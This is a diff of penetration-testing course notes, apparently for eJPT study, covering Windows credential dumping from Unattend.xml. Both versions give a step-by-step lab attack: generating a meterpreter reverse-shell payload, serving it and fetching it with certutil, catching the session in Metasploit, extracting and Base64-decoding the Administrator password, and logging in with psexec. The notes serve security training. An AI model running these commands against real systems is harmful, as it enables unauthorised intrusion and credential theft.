noelenz/eJPT-Course-Notes/Host & Network Penetration Testing /System & Host Based Attacks /Windows /Credential Dumping.md

 ![grafik](https://github.com/user-attachments/assets/448a152b-8e1c-4b6d-a87d-f2def4139e73)

 # Windows Configuration Files

 ## Unattended Windows Setup
-- The Unattended Windows Setup utility will typically utilize one of the following configuration files that contain user account and system configuration information:
+- The **Unattended Windows Setup** utility utilizes configuration files that contain user account and system configuration information.
+Key files include:
-  - C:\Windows\Panther\Unattend.xml
+  - `C:\Windows\Panther\Unattend.xml`
-  - C:\Windows\Panther\Autounattend.xml
+  - `C:\Windows\Panther\Autounattend.xml`
- - As a security precaution, the password stored in the Unattended Windows Setup configuration file may be encoded in base64.
+- For security, passwords in these configuration files may be encoded in Base64.

 ## Demo: Searching For Passwords In Windows Configuration Files

-We are going to gain access to the target via a meterpreter session.
-After, we will use our meterpreter session to find the unattend.xml file to identify the password and decode it with the base64 utility and then authenticate with the target via PSexec.

-`netuser` on target: we are running an unprivileged user `msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST [ownIP] LPORT=1234 -f exe > payload.exe`: We generate a malicious payload
-`ls`
-`python -m SimpleHTTPServer 80`: Set up a simple http server to host the payload.exe file with the python module simpleHTTPserver.
-We can now download the payload.exe on the target by accessing the webserver on the kali linux machine  own ip:10.10.49.6 on the target: cmd
-`cd Desktop`
-`certutil -urlchache -f http://[kali system]/payload.exe payload.exe`: file downloading
-before we execute it, we shut down the webserver: kali linux:
-`service postgresql start && msfconsole` msf5:`use multi/handler`
-msf5:`set payload windows/x64/meterpreter/reverse_tcp`
-msf5:`set LPORT 1234`
-msf5:`set LHOST [kali IP]`
-msf5:`run`
-When we execute the payload on the target system, we will get a meterpreter session
-meterpreter: `sysinfo`: we have access to the target
-meterpreter: `search -f Unattend.xml`
-meterpreter: `cd C:\\`: we can also do it manually
-meterpreter: `cd Windows`
-meterpreter: `Panther`base
-meterpreter: `dir`: Here we can find the unattend.xml file
-meterpreter: `download unattend.xml`
-meterpreter: `ls`
-meterpreter: `cat unattend.xml`: contains information to the installation of Windows

-*copy password*.
-If "PlaneText"= false, the password is encoded in base64 `vim pasword.txt`: paste copied password
-`base64 -d password.txt`: we get the encrypted password test it out:
-`psexec.py Administrator@[target IP]`
-`enter decrypted password`

-We should get a cmd shell session.
+In this demonstration, we gain access to the target via a meterpreter session, locate the `Unattend.xml` file to identify the password, decode it with Base64, and authenticate with the target using PSexec.

+1. **Check User Privileges on the Target**
+   - Run the following command to check user privileges:
+     ```
+     net user
+     ```
+   - This command shows the user accounts on the target.
+We use it to confirm if we are running as an unprivileged user.

+2. **Generate a Malicious Payload**
+   - Create a malicious payload using `msfvenom`:
+     ```
+     msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[ownIP] LPORT=1234 -f exe > payload.exe
+     ```
+   - This command generates a reverse TCP payload for meterpreter.

+3. **Set Up a Simple HTTP Server**
+   - Start a simple HTTP server to host the payload:
+     ```
+     python -m SimpleHTTPServer 80
+     ```
+   - This command sets up a basic HTTP server to serve `payload.exe`.
+We can access the server from the target system to download the payload.

+4. **Download and Execute the Payload on the Target**
+   - On the target system, open the command prompt and navigate to the Desktop:
+     ```
+     cd Desktop
+     ```
+   - Download the payload using `certutil`:
+     ```
+     certutil -urlcache -f http://[kali system IP]/payload.exe payload.exe
+     ```
+   - This command downloads the `payload.exe` from the HTTP server to the target system.

+5. **Set Up Metasploit to Handle the Payload**
+   - On our Kali Linux machine, start PostgreSQL and Metasploit:
+     ```
+     service postgresql start && msfconsole
+     ```
+   - Configure Metasploit to handle incoming connections from the payload:
+     ```
+     use multi/handler
+     set payload windows/x64/meterpreter/reverse_tcp
+     set LPORT 1234
+     set LHOST [kali IP]
+     run
+     ```
+   - These commands set up Metasploit to listen for the reverse shell connection.

+6. **Establish a Meterpreter Session**
+   - When the payload is executed on the target, a meterpreter session should be created.

+7. **Search for the Unattend.xml File**
+   - In the meterpreter session, gather system information:
+     ```
+     sysinfo
+     ```
+   - Search for the `Unattend.xml` file:
+     ```
+     search -f Unattend.xml
+     ```
+   - Alternatively, navigate manually to the directory:
+     ```
+     cd C:\
+     cd Windows
+     cd Panther
+     dir
+     ```
+   - Download the `Unattend.xml` file to our local machine:
+     ```
+     download Unattend.xml
+     ```

+8. **Extract and Decode the Password**
+   - View the contents of the `Unattend.xml` file:
+     ```
+     cat Unattend.xml
+     ```
+   - If the `PlainText` attribute is `false`, the password is encoded in Base64.
+Copy the encoded password.
+   - Create a text file and paste the copied password:
+     ```
+     vim password.txt
+     ```
+   - Decode the Base64-encoded password:
+     ```
+     base64 -d password.txt
+     ```

+9. **Authenticate with the Target Using PSexec**
+   - Use PSexec to authenticate with the target system as Administrator:
+     ```
+     psexec.py Administrator@[target IP]
+     ```
+   - Enter the decrypted password when prompted.

+   - We should now gain a command shell session on the target system.